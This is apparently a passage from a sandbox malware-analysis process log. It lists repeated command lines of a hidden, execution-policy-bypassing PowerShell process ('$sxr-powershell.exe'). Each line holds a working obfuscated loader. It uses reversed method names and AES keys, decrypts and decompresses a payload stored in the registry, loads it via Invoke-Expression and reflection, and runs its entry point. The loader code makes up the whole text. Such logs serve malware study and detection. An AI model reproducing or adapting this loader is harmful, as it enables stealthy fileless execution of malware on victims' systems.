[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        
        PID:6704
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        
        PID:3296
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        
        PID:6572
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        
        PID:2692
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = 